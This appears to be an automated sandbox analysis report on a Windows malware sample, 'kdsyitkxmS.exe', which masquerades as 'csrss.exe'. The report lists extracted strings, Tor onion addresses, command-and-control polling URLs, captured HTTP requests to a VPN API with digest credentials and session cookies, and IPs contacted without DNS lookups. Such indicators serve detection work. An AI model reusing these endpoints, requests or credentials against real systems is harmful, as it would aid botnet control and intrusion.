%wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Uses STUN server to do NAT traversial
        Source: unknownDNS query: name: stun.stunprotocol.org
        Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server5.duniadekho.barUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15Content-Length: 752Version: 195Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server5.duniadekho.barUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.102 Safari/537.36Content-Length: 752Version: 195Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: POST /v4/register_subscriber HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 122Accept: application/jsonContent-Type: application/x-www-form-urlencodedSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
        Source: global trafficHTTP traffic detected: POST /v4/register_subscriber HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 122Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_subscriber", response="c831806b14e2c3b7004579ec11587612cdb1b3917335891cf7235198c99dc729", algorithm=SHA-256, cnonce="000275160ea60cbdba91b4cc7df429a08789804f2c6a668bf7f545196daed8cb", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000002Content-Type: application/x-www-form-urlencodedSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
        Source: global trafficHTTP traffic detected: POST /v4/register_device HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 104Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_device", response="e52728886ab90acd4e20176061d98c9597dfc0e29f7caa7fe9f79f26f8a6905e", algorithm=SHA-256, cnonce="096351fa04f952336d066a61ea276680eb33abaa2d9cd34e42ccb75380bbebe6", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000003Content-Type: application/x-www-form-urlencodedCookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFlSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
        Source: global trafficHTTP traffic detected: POST /v4/discover HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 79Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/discover", response="6646ff41f2e352bbf338a01d45b12aa3ad1ca7b27dd967c0cec8bb32f4d3882a", algorithm=SHA-256, cnonce="1aac6b7a1b1d1ba6d73b41ee4a40e57426e70bce1ac85d74449c90bceeb0c432", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000004Content-Type: application/x-www-form-urlencodedCookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFlSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
        Source: global trafficTCP traffic: 192.168.11.20:49996 -> 62.210.99.238:39819
        Source: global trafficTCP traffic: 192.168.11.20:49999 -> 77.68.94.106:9001
        Source: global trafficUDP traffic: 192.168.11.20:64952 -> 74.125.204.127:19302
        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:32:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Access-Control-Allow-Credentials: false
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:33:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Set-Cookie: PHPSESSID=9afcop0lb77374j5hf7sfs0fck; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Credentials: false
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.65.26
        Source: unknownTCP traffic detected without corresponding DNS query: 158.69.205.247
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.65.26
        Source: unknownTCP traffic detected without corresponding DNS query: 158.69.205.247
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.65.26
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 158.69.205.247
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 51.159.136.111
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: unknownTCP traffic detected without corresponding DNS query: 77.68.94.106
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://invalidlog.txtlookup
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
        Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233b
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
        Source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.xmlspy.com)
        Source: csrss.exeString found in binary or memory: http://www.zlib.net/
        Source: csrss.exe, 00000014.00000003.210662530760.000000000C6C6000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210662422652.000000000C6D6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
        Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1.1.1.1/dns-query
        Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.sec-tunnel.com/v4/device_generate_passwordinternal
        Source: csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindex
        Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.sec-tunnel.com/v4/subscriber_logininconsistent
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blockchain.infoindex
